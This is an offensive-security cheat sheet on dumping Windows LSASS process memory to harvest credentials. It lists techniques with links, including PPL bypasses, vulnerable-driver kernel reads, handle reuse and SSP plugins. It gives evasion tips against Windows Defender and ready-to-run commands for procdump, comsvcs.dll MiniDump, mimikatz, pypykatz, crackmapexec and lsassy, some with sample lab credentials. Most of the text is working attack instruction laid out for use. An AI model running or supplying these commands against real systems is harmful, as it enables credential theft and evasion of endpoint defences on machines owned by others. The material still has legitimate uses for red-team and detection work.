LSASS dump

Principles

API

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass

MiniDumpWriteDump in dbghelp.dll

Read LSASS memory from the kernel through a vulnerable driver
  • EDRSandblast

https://github.com/wavestone-cdt/EDRSandblast

Evasion

Windows Defender terminates any PowerShell process that attempts to dump LSASS, so it is important to use CMD or a .NET tool for this rather than PowerShell.

Abuse the RtlReportSilentProcessExit API

https://github.com/deepinstinct/LsassSilentProcessExit

Dump LSASS with shellcode

https://lengjibo.github.io/lassdump/

Inject into LSASS

https://github.com/M-r-J-o-h-n/LSASS-injector/blob/master/LsassInjector/LsassInjector.cpp

Reboot the system into Safe Mode

Bypass PPL

  • Delete the RunAsPPL registry value and reboot (probably the worst method, since any credentials held in memory are lost)
  • Disable the PPL flag on the LSASS process by patching the EPROCESS kernel structure
  • Read the LSASS process memory contents directly instead of going through the open-process function

https://github.com/RedCursorSecurityConsulting/PPLKiller

Seclogon: abuse leaked handles to dump LSASS

https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
https://github.com/antonioCoco/MalSeclogon

Reuse an already-open LSASS process handle (NtDuplicateObject)

https://skelsec.medium.com/duping-av-with-handles-537ef985eb03

Load an LSA plugin

https://www.pentestpartners.com/security-blog/dumping-lsass-in-memory-undetected-using-mirrordump/
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package

Use a process fork to dump LSASS

https://github.com/D4stiny/ForkPlayground

Tools

Microsoft-signed tools

  • ProcDump

-ma, with and without -r:

procdump.exe -accepteula -ma lsass.exe lsass.dmp
// or avoid reading lsass by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

  • Task Manager
  • Process Explorer (procexp)
  • SQLDumper

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/

  • comsvcs.dll

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

Run from a process that holds the debug privilege, e.g. powershell.exe

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://en.hackndo.com/remote-lsass-dump-passwords/

  • CreateDump.exe (.NET 5)

Other signed tools

  • Process Hacker
  • ProcessDump.exe (Cisco Jabber)

cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp

  • Avdump.exe (component of the Avast antivirus product)
  • WinPmem (Google-signed) / physmem2profit

https://labs.f-secure.com/blog/rethinking-credential-theft/

  • hiberfil.sys/RawCopy

https://github.com/jschicht/RawCopy
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

  • VMEM/VMSN

https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

Other tools

  • mimikatz

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

  • Pypykatz

pypykatz lsa minidump lsass.DMP

  • Crackmapexec

crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa

  • Lsassy

lsassy -d test.lab -u testadmin -p Password123 192.168.0.76
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 -M lsassy

https://cloud.tencent.com/developer/article/1576465

  • SharpDump

https://medium.com/@markmotig/research-and-organization-on-the-go-and-refinement-when-time-permits-3d25763d3586

  • Dumpert

https://github.com/outflanknl/Dumpert

  • Out-Minidump.ps1

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1

Other collected references

https://wbglil.github.io/2021/02/19/MiniDumpWriteDump%E6%9D%82%E8%AE%B0/
https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump